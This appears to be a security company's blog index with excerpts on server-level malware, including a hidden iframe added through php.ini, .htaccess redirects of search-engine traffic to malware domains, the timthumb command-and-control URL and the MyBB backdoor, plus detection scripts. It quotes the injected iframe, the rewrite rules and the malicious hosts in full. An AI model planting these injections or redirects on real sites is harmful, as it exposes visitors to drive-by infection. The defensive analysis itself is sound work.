Malware Being Called From Your php.ini File

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory and look in your main configuration files (especially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:


Read More
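One way to spot this class of injection when scanning a site's rendered pages is to pair inline CSS that hides an element with an iframe of the same id that loads from a foreign host. The script below is an added example, not Sucuri's own tooling; the sample HTML is constructed from the snippet quoted above plus a visible off-site embed that should not be flagged, and the 10px "tiny frame" threshold is an assumption.

```python
import re
from urllib.parse import urlparse

# Constructed page, modelled on the injected iframe quoted in the post, plus a
# visible off-site embed that a scanner must NOT flag.
SAMPLE_HTML = """<html><body><p>Welcome</p>
<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>
<iframe id="promo" src="https://videos.example.net/embed/1" width="640" height="360"></iframe>
</body></html>"""

STYLE_RE = re.compile(r"<style[^>]*>(.*?)</style>", re.I | re.S)
RULE_RE = re.compile(r"#([\w-]+)\s*\{([^}]*)\}", re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')

def px_value(value):
    """Parse a CSS length like '10px'; return None for anything else."""
    m = re.fullmatch(r"(\d+)\s*px", (value or "").strip())
    return int(m.group(1)) if m else None

def hidden_ids(html):
    """Ids that inline <style> rules make invisible or near-invisible (<= 10px, an assumed threshold)."""
    ids = set()
    for css in STYLE_RE.findall(html):
        for elem_id, body in RULE_RE.findall(css):
            props = {}
            for decl in body.split(";"):
                if ":" in decl:
                    key, val = decl.split(":", 1)
                    props[key.strip().lower()] = val.strip().lower()
            sizes = [px_value(props.get(d)) for d in ("width", "height")]
            tiny = all(s is not None and s <= 10 for s in sizes)
            if props.get("visibility") == "hidden" or props.get("display") == "none" or tiny:
                ids.add(elem_id)
    return ids

def suspicious_iframes(html, site_host):
    """(id, src host) for every iframe that is hidden by CSS and points off-site."""
    hidden = hidden_ids(html)
    findings = []
    for attrs in IFRAME_RE.findall(html):
        a = {k.lower(): v for k, v in ATTR_RE.findall(attrs)}
        src_host = urlparse(a.get("src", "")).hostname or ""
        # Flag only the combination: hidden by CSS AND loading from another host.
        if src_host and src_host != site_host and a.get("id") in hidden:
            findings.append((a["id"], src_host))
    return findings
```

Because the injection lives in a server-wide PHP setting rather than in any file under the web root, run this against fetched pages (or the output of a local curl) rather than against the site's source files, and a hit on a clean code base points you at php.ini as the post suggests.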

Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

If you have any questions about malware, blacklisting, or security in general, send them over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here.

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, its owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 minutes (about 13 hours)
  • Minimum time: 290 minutes (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.


Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!

WordPress 3.3 is Out

For all our WordPress users, please remember to update to WordPress 3.3, which was just released. It should be a quick 1-click process in your dashboard, and nobody has an excuse not to do so.

And if you are currently using any version before 3.2.1, you better run!

Thanks,

The New (and Old) .htaccess Attacks – Now Using .in Domains

We have been talking about .htaccess redirections for a while. A site gets compromised and the attackers modify the .htaccess file(s) to redirect any search engine traffic to a different (malicious) page that attempts to compromise the browser / computer of anyone visiting the site.

For the most part, the attackers have been using .ru domains to distribute the malware. Here are some of the domains used:

face-apple.ru
fightagent.ru
power-update.ru
syntaxswitch.ru
window-switch.ru


Read More

Dre Armeda: WordPress End-User Security

Sucuri Co-Founder Dre Armeda did a great presentation at WordCamp Chicago about end-user security for WordPress users.

Check out the video here:

Dre will also be speaking at WordCamp Las Vegas 2011, make sure to say hi if you’re attending.

Joomla 1.5.25/1.7.3 Released (Security Update)

If you are using Joomla, now is the time to update it. A new version was just released for the 1.5.x and 1.7.x branches fixing a high priority security issue that allows remote users to change other users’ passwords (even the admin account).

More details on the Joomla website and here.

Description:
Weak random number generation during password reset leads to possibility of changing a user’s password.

Read More

Htaccess Redirection to Sweepstakesandcontestsinfo dot com

Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.

This domain has been used to distribute malware for a while (generally through JavaScript injections), but only in the last few days did we start seeing it being done via .htaccess.

* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.

This is what gets added to the .htaccess of the compromised sites:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>
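To check a compromised site's .htaccess for this pattern, and to see why the owner browsing directly never sees it, the added example below (not Sucuri's code) parses referer-conditioned RewriteCond/RewriteRule pairs, flags targets that leave the site, and evaluates the rules for a given Referer header. The .htaccess text is the block quoted above; only plain regex conditions are modelled, and Python's re is assumed close enough to Apache's PCRE for this pattern.

```python
import re
from urllib.parse import urlparse

# Constructed .htaccess content reproducing the rule block quoted in the post.
HTACCESS = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

def parse_referer_redirects(text):
    """Pair each HTTP_REFERER RewriteCond with the RewriteRule that consumes it."""
    pending, rules = [], []
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            flags = (m.group(2) or "").upper().split(",")
            pending.append((m.group(1), "NC" in flags))  # NC = case-insensitive match
            continue
        m = RULE_RE.match(line)
        if m:
            if pending:
                rules.append({"conds": pending, "pattern": m.group(1), "target": m.group(2)})
            pending = []  # conditions apply only to the very next RewriteRule
    return rules

def offsite_redirects(text, site_host):
    """Referer-conditioned rules whose target leaves the site: (target, target host)."""
    hits = []
    for r in parse_referer_redirects(text):
        host = urlparse(r["target"]).hostname
        if host and host.lower() != site_host.lower():
            hits.append((r["target"], host))
    return hits

def simulate(text, referer, path="index.html"):
    """Target a visitor arriving with this Referer is sent to, or None if no rule fires."""
    for r in parse_referer_redirects(text):
        conds_ok = all(re.search(pat, referer, re.I if nc else 0) for pat, nc in r["conds"])
        if conds_ok and re.search(r["pattern"], path):
            return r["target"]
    return None
```

A direct visit sends no Referer, so simulate(HTACCESS, "") returns None while a visit from a search result page returns the redirect; reproducing the symptom by hand means sending a request with a search-engine Referer header, not just loading the site in a browser.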


Read More

Timthumb.php Mass Infection – Aftermath – Part I

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.

Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.

It would be useful to gain metrics based on the number of sites that were truly affected; the problem is that it’s very hard to estimate how many sites were in fact compromised. 1 thousand, 100 thousand, 1 million? Who knows for sure.

We found a way to get close to the actual numbers. For the last couple of months most of the sites compromised had their wp-settings.php modified with a function to contact the URL http://91.196.216.30/bt.php for more information on what to do with the site (display malware, spam, etc). Yes, kinda like a command and control site.

Read More

MyBB web site and downloads compromised

It’s not good when your site gets infected with malware, especially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site was hacked and the software download packages compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommends these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder.

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.

Evil backdoors – Part II

A few months ago we did a post about backdoors, explaining how they work and how to look for them. If you didn’t read it, take a read here:

ASK Sucuri: What about the backdoors?

However, we still see people on online forums recommending searching for “eval ( base64_decode” and things like that when looking for backdoors. If you review our examples in that article, you can see that it would miss a few of them.

Today we started to see another type of backdoor that most signature-based tools can’t find. Take a look:

Read More